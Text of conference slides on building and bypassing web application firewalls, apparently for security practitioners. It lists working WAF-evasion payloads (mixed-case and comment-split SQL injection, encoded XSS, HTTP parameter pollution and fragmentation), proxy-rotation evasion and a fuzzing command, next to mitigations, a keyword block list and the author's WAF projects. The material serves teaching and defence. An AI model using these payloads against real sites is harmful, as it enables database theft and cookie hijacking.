Custom Web application firewall for modern world 

Whoamy ● Antonio Costa aka Cooler_ ● Projects: Github.com/CoolerVoid ● Contact: [email protected] ● Cyber security engineer ● Programmer/developer ● 13 years of work experience with pentest, codereview, development, incident detection, incident response and hardening. 

Simple case 

Request GET /sell/cars.php?search=alert(document.cookie)</ script > 

Request rules ● Full Match ● Blocklist ● Rank based ● Regex ● DFA ● AI ● ML 

Other resources for rules ● Block per IP adress ● Leak mitigation(responses) ● Insert anti-csrf tokens ● Detect UserAgent anomaly ● Strong blocklist ● Denial of service ● Force hardening in custom endpoints Headers HSTS, anti-xss, CSP, nosniff… ● Insert cookie attributes, httponly Secure... 

Practical point view ● Detection the type of WAF ● Common attacks in WAF ● Custom attacks to bypass WAF ● Attack Mitigation in WAF ● Attack Mitigation in application ● Create your custom WAF ● My OpenSource Projects ● Attack and Protection! 

Detection You can search a pattern in cookie, header response… Each WAF have a different context in response. ● https://svn.nmap.org/nmap/scripts/http-waf-detect.nse ● https://github.com/sandrogauci/wafw00f ● http://code.google.com/p/imperva-detect/ 

Common attacks ● WAFs can be configured to actively block requests and traffic that violate the WAF rule-sets. This is a useful feature, but needs to be used judiciously, an WAF that is in over-active blocking mode prevents legitimate traffic from reaching the Web server, making the application unusable. ● Sometimes have a weak rules, that don’t match attacks to block. 

Mixed case ● Cool trick to bypass a common rule is mixed case, here the big purpose is bypass absence of case sensitive rules. ● SELECT, SeLect, selEcT… UnIOn, unIoN... ● Look this following: ● /sell/cars.php?search=alert(document.cookie) ● /sell/cars.php?search=AlErt(DoCuMenT.cOoKie) 

Replace Keywords ● Replace Keywords is common function in WAFs, this resource erase critical points in attacks, but you can bypass this, you need a point to insert attack word between payload. ● Look this following: ● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 ● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9 

Spaces to comment ● Replace points to comments is very good way to bypass WAF. ● Look this following: ● /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()– - ● /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*! ● table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– - 

Encode abuse ● Other trick to bypass, is the abuse of encode, sometimes application can render encoded strings... ● Look this following: alert(document.cookie) ● Url encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E ● 64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ= 

Buffer Overflow ● When WAF service don’t have a proper validation in inputs, you can see this problem in fuzzing tests... ● Look this following: ● /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7… ● id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...) +uNIoN+seLecT+2,3,version()... 

HTTP Parameter Pollution(HPP) The following request doesn’t allow anyone to conduct an attack: ● /?id=1;select+4,5,6+from+users+where+id=1-- ● This request will be successfully performed using HPP. ● /?id=1;select+4&id=5,6+from+users+where+id=1-- ● Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked 

Using HTTP Parameter Fragmentation (HPF) execute_query("select * from table where a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); ● The following request doesn’t allow anyone to conduct an attack ● /?a=1+union+select+1,2/* These requests is a possible attack using HPF ● /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become ● select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users-- 

Time machine ● Random delay each request ● Random UserAgent per request ● Random IP address per request(Proxy) ● Bypass Intrusion prevention system (IPS) Web application firewall (WAF) 

Automate ● Project to change your list of payloads using a lot techniques to help bypass a WAF. ● https://github.com/CoolerVoid/payloadmask 

Fuzzing / Brute ● 0d1n is a tool for automating customized attacks against web applications. ● Open Source ● Use thread pool ● Github.com/CoolerVoid/0d1n 

Fuzzing / Brute 

Fuzzing / Brute ● 0d1n –host http://localhost/test.php –post ”car_name_search=ˆ ” –payloads payloads/xss.txt –find_regex_list payloads/guess.txt –log name_log –save_response –tamper urlencode -proxy-rand payloads/proxy.txt 

Fuzzing / Brute 

Application mitigations ● Validation and proper sanitization(remove DOM, js, HTML…). ● Prepared Statements (with Parameterized Queries). ● Create a function that check a Block list with common words in attacks (eval,timeout,union,--, select, delete, version, benchmark, sleep, /**/...), set all string to lower case before scan pattern. ● Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls in resources. ● Follow Mitre and OWASP tricks to hardening etc... 

Create your WAF 

Create your WAF ● Study five years around sockets and raw sockets ● Demultiplexer problems (select(), epoll(), kqueue(), pthreads(), MPI…) ● Race conditions ● Testing a lot list of libraries libuv(used by node) libevent(old lib for core of nginx) Python Twisted 

Create your WAF ● WAF from the scratch RaptorWAF ● Demultiplexer use select() with pthreads ● Have a problem, race conditions in millions connections(lock with mutex cannot save). ● Easy to understand ● Github.com/CoolerVoid/RaptorWAF 

Create your WAF ● Pthread tests ● Libevent study ● Lighthttpd core study ● The big travel... 

Create your WAF ● OctopusWAF ● Uses LibEvent ● Have support to heavy connections ● Uses lib Injection to detect SQLi ● Github.com/CoolerVoid/OctopusWAF 

Create your WAF 

Detections 

Detections ● Machine learning ● Natural language ● IA ● Score based ● Uploads (binary checks) 

Questions ? 

Thank you Contact: [email protected]